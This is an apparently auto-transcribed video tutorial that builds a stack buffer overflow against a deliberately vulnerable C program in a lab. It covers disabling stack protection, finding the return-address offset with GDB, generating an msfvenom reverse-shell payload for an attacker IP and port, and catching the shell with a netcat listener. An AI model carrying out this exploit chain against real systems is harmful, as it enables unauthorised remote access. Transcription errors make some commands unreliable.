All right, everyone. So, the buffer overflow. What is buffer overflow? Here is a short definitions and a small diagram. And with the help of this, we will understand what is buffer overflow. Here is a written a short note. In a computer program, variables are allocated with fixed size blocks of memory. Okay. After this memory is allocated, the program can store and retrieve data from these locations. Buffer overflow occurs when amount of data written to one of these blocks of memory exceeds its size. See, what it's saying is that suppose if we give a buffer size something, okay, and we put that over exceed inputs what we have given the actual buffer size. Okay, suppose that if we load a program or load our applications, okay, when it goes to the memory, it load these spaces. Suppose it took 10 spaces, 0 to 9, and in that I have defined that buffer will be 0 to 6. Okay, and I'm putting the data or putting some size extra to that buffer. So the extra is 1, 2, 3. This is the overflow, and this program program is the actual buffer size. Okay, and this part is overflowing. Okay, so what buffer overflow is, it's simply that we suppose we give some input about 10 byte and it's already mentioned in the program that it took 20 byte of input, and if we give over 20 byte, that will be the program will be crashed. Okay, so with the help of crashing the program, we can execute our malicious code or something, whatever we want. Okay, so this is the actual buffer overflow means. So let's start to our practical. Okay, first of all, we're gonna write a program in C. Usually it's occur in C or C++ program. So I'm gonna write a program in C. First of all, I'm gonna make a directory of will be quite easier for me to understand to keep these things separate, not to mash up. Okay, now I'm gonna write a program in C. Okay, 10. So it's a simple program. Sorry. Okay, I haven't mentioned the extension .c, that is why it's was taking as a string part. Okay, taking a function for flow. Okay, and in that function I'm gonna use a character naming buffer, character variable naming buffer, and I'm gonna give it size 200. Okay, again I'm gonna initialize an integer variable called input. Okay, now in input I'm calling read function, okay, to read my input in buffer. Okay, and I am giving the input size 300, means it can input 300 words. Okay, argument count and character argument vector. Okay, okay, it's a simple C program. I'm initializing a function called overflow, and in that I'm creating a buffer variable which is 200 byte and a integer variable called input, and in input I'm again using read functions to for input in buffer character. Okay, and the input limit will be 300, and it's and after that it will return. Before return, okay, printf user buffer. Thank you. So it's in printf function to print my message, how much my input is and how much buffer contain, and it's a return after that. And in main, it's a main function where I'm calling the overflow function. Okay, so it's just a simple program to check the that overwrite. Okay, so before compiling, you need to see I have to check whether stack protector is on or not. Okay, the stack protector is on here. It's already written is 2. So what I have to do is I have to remove the stack protector. Okay. Okay, so here it's 0. The stack protector has been removed. Now I will compile our C program, which is overflow.c. So gcc space hyphen f no stack. This command is also for removing stack protector from the stack. Okay, so line this and something error. Okay, let's see where is character buffer int input read function is also okay. Printf. Percent t string return is also okay. Character argument to overflow is calling. Things is okay. Something. I've done something wrong over here. Let me see what the error is saying. Overflow C19 error expected this and this before character. Okay. Buffer is okay. 200. the program has been compiled. Overflow, let's check. I have to give input. Okay, the user input is 7 and the buffer count is 1 2 3 4 5 6. Okay, it's a simple program because the buffer size is 200, I have already mentioned, and I'm just taking an input is 7. Okay, so it's a very small, so the program will not going to be crashed. If you want to crash, then we have to create a heavy large amount of input. So I'm gonna use the Python program to create some large amount of text. So here is the code, Python C print a into 400 times. Okay, and move into buffer dot txt. All right, cat. Okay, it's a 400 times a means it's 400 byte of space. Okay, now I'm gonna use this this in GTB. Okay, GTB hyphen Q. GTB is a tool where we examine the program. Okay, in stack, what it is actually behaving. So I'm gonna use this program in GDB. Okay, so I'm gonna run this buffer dot txt inside GDB. User input is now 46 and buffer count is it now? User input 5 and sorry, what? Okay. This is the reason. Actually, it's my mistake. Now it's okay, it's corrected. So inside GDB, run txt. Okay, the program receive the segmentation fault. User input is 300. Okay, because the input limit is 300 and the buffer size is 200. Okay, and giving the input above 300 and the buffer size is 200, so the program is crashed. Here it's showing the segmentation fault. All right, and this from this address, actually the program after executing, and when executing it has to be returned, then it is not getting the proper address where to return after executing the program. Alright, so let's examine in GDB again. What it is behaving. So again I'm opening this in GDB and disassembling main function, and in main function there is a overflow. It is calling an overflow. So I'm gonna disassembling overflow function. If you remember, I have already created an overflow function inside the C program. So here is the overflow, and these are the address on stack. Okay, and this it's a push, it's moving, subtracting, moving, move L, load effective address, move, move, calling a read function, okay, moving some variables. These are the registers. Okay, these are the registers where data is been, where data stores. Okay, EAX. So give a breakpoint over read function or return function. Okay, I'm gonna use this over return over here at this address. Gonna use a breakpoint. Paste into the breakpoint. It's been okay. Now I have to run the program with our large buffer byte. Okay, the program. Okay. Now. So. Asking this address. Let me tell you one thing one more time. Okay, this not main direct overflow. Disassembly okay. All right, and the breakpoint will be at this read function. Okay. Here Actually, just wanted to show you at print function or at read function which will is suitable for. Okay, at this function. Copy. I have to just explain a little bit. Okay, now I have to run the program. Okay, the program has been run. Display. Okay, actually here is a breakpoint at read function. Okay, so before this program has been run, 20i. Let me check what is this variable. It's $12c. Okay, copy and print $0x12c. Value can't be converted into integer. Okay, examine 10 word hex can't be converted into integer. X by S. Address out of bound. Okay, print. So it's 300. That 0x12c is holding our input count. Sorry, input number of inputs. So the number of input will be minimum will be 300. Okay. And what other, let's see, zero x d four. Let me check. Zero x d four. 202. That will be our buffer space. Okay. The next instructions. Okay, let's find out what register EAX hold. It's 300 input it's holding and it's moving into EBP hyphen 0xc. Okay. So let me check. $EBP-0xC. A, it containing a 100 times. Okay, it's showing. Address, see this address, and if we examine this address, copy, examine 10 code hex paste. So see, it's 41 means A. Okay, so this register is holding our A input. Okay, sorry, this register is holding our A input, and I'm gonna check this ABP-0XD. XD4. And if we examine this copy, examine 10 hex paste, so it's holding our A character. Okay, A repeats 200 times. Okay, so this EBP-0XD4 is actually the buffer one. Okay, our buffer variable, it's holding the 200 byte space. Okay, now just simply move into the next instructions. Move next, and C for continue, and see, it's displaying this cannot access memory at the address 0x AAAA, means the return address is being overwritten by A. Okay, so the A has been overwritten the return address, where it has to return. Suppose that a program has been called and it has to be performed, and after performing the function task, the function has to be returned. So while returning, the return address is being overwritten by the A. So with the help of this, we can exploit or do whatever we want. So first of all, we have to find the exact buffer value where it is actually overwriting. So I'm gonna quit this GDB. Okay, and then other terminal, I have to write creating a pattern. So I'm gonna creating a pattern create 400. Okay, the pattern has been created, and I'm just copying it, copy, and creating nano space pattern dot txt. Okay, paste. All right, control O for the overwrite, control X for the quit. Okay, we see pattern dot txt, it's been here. Okay, now I'm gonna run this pattern this pattern to find the exact buffer address where the program is crashing. Okay, we got the address 0x4325416E. This at this address, at that place, the program is crashed. So I'm just copying this. Okay, and we have to find out the offset to check at what buffer count. So pattern offset this and paste this one. Okay, found at offset 216. So after 216, the program is getting crashed. Okay, now we have to just verify that is it true or not. So quit this GTB. Okay, now again creating Python program, print A will be 2 1 6 okay plus B multiply by 4 times plus C multiply by 100 TXT. Okay, what is this? Oh, okay, offset. So analyzing this in GDB. All right, run this. See, yes, it actually over crashing after 216 byte. So here is 42 means B, and I have given 4 time B, it's the third one and the fourth one. So after this we got the EIP, okay, where the program is crashing at what buffer. Again we gonna cross check. We can, so with the help of, we find that after 216 byte the program is crashing, and the return address is, the return address is been replaced by the B, okay, where it has to be returned. So we can do some stuff like nano overflow dot c. Okay, are called creating a function. Okay, print exploit. Okay. Alright, creating a function, a never call means I'm not calling this function inside the main function, just to check that we can replace or we can redirect the return value at this address. Okay, just simply checking that is it working or not. All right, so first of all object dump overflow file format not recognized overflow dot oh sorry I haven't compiled. Okay, I have to just compile okay now this will overflow.c crap never called what oh sorry okay so at this address this is the address stack address of never called function we can again cross check by inside the GDB space overflow. Okay, just simply disassemble never called. So this the see the address this and the this are same. Okay, I have to just write this address, just copying and putting it someplace. Okay, now quitting. Now again, I'm creating a text file to redirect my program at this level inside B because after 200 the return value is been overwritten by the B. So if we give the address of any other function it will reach at that address. So I'm just checking whether it is going or not. So the address will be hex form 0 will be in the reverse order. The first one is 3, 4, 1x, 3, 4, 8, 4, 4, 5, 1x, 0, 4, x, and 0, 8. Why we are giving this address in reverse order? Because when it load, it will, if we give like this 0804834, it will load over the stack in a reverse order. Okay, the address will be reversed. So I am here putting the in a reverse form. When it load on the stacks, it will arrange in a fair order. Okay, now analyzing in GDB. Okay, now running. Next. See, hello world from exploit. Means our execution is successful, our exploit is successful. We can exploit these kinds of overflow. Now I'm just gonna try to get the reverse shell with the help of this S exploit. So we have to, first of all, we have to find the EIP RIP value. So what I'm again gonna change these things with B. Four times this to the offset, and okay, flow. All right. Intel. Assemble overflow. Okay, and I'm just putting the breakpoint at the return value. Okay, breakpoint at this address, at return address, paste. Okay, now running my program with offset. Okay, the user is input and this display 20 PC. Okay, all right. I have done something wrong. Actually, I just give the breakpoint at on another level. Okay, let me quit this program again. Okay, and I'm just disassemble overflow. Okay, git breakpoint at this level. Paste key. Now I'm running this program upset key. So program has been run. Now I have to check the RIP. So RIP will be har EPP0x12c. Okay, did I set this in? No, set disassembly flavor Intel. Okay, display. Check this variable print dollar ESP at this address what it is actually showing. We have to just examine 10 word hex and this paste. Okay, no, yes, from this address, if we see this stack address 640 means 0 640 641 642 643 and this 644 means our the address the buffer is storing from this address after 644. So we have to check the this EBP minus 0xd4 to examine. Okay, so print dollar EBP minus 0xd4. Okay, see this address, and if we check, if we examine this by shortcut one, okay, repeating a 200 times. Okay, and if we examine this address, copy x by 10 word hex, paste this. Okay, so from this 644 it is showing, it's been starting. So the our RIP is 644, and if we check at x by s this paste 643. If we check, it's null. 642 some kind of data, but it is actually starting from at this address. So our RIP address will be this. Okay, paste. I'm just storing, keeping this place. Okay, now what I have to do is I have to create a Python code. Okay, a Python program. Let me horizontally. Alright, creating a shell code with MSF. Before this, if config okay, the IP address is 192.168.198.183. This will be our attacker IP address. So the shell code will be MSF venom space hyphen p space linux x86 / shell underscore reverse underscore tcp. Okay, l host, local host, listening host we can call, or attacker host, whatever we called. 192.168.198.183. okay, this will be l port, listener port will be 4444, whatever we can see. This is hyphen b for bat character. What kind of bat character is that? 00 means the termination. Okay, the termination bat character I have to the 00. Okay, to remove this. And the hyphen f is file format. In what kind of file we have to write the shell? So I am writing this shell code in the Python. Okay, creating this. It will take some time. So we have to wait for this. Okay, so our Python payload has been created. So we just have to copy this. Okay, we just copied this payload and alright. Now Python space exploit.py. Sorry, nano. Okay, and I have to just copy this payload in the Python program. Okay, so I have already copied it. Need to just paste it over here. Okay, and below I have to write a print buff plus e multiplied by 216 minus length of buff. Okay, this close and this adding our RIP. So our RIP is this. Okay, so we have to just write in the reverse order: forward slash x 44 forward slash x f6 f6 forward slash x the ff forward slash x the bf. Okay, C 0, so that it hold our program. So this will be the our payload. Okay, so overwriting control X. Okay, so Python exploit dot py moving into exploit dot txt. Okay, where is the, oh yeah, sorry, my mistake, I have just forget to put the star marks. Control O, Control X. Alright, now I'm gonna compile this python.exploit into exploit.txt. Okay, cat exploit.txt. Alright, the code is being written in text form. Now I have to use the netcat command nc-lvp space 4x4 our listening port and start listening. Okay, now gdb -q space overflow run, sorry, breakpointed flow okay run this exploit dot txt. No, see, continue, see, here we got the connection from this IP address. Okay, and if we check ls command for listing, it's just showing overflow, buffer overflow, exploit, exploit dot text, or pwd present working directory, user ID is nebula. Okay, who am I, nebula. Okay, that's it. So we see by exploiting the buffer we can get the shell also. So thank you from my end, and I hope you understand. Thank you for your time.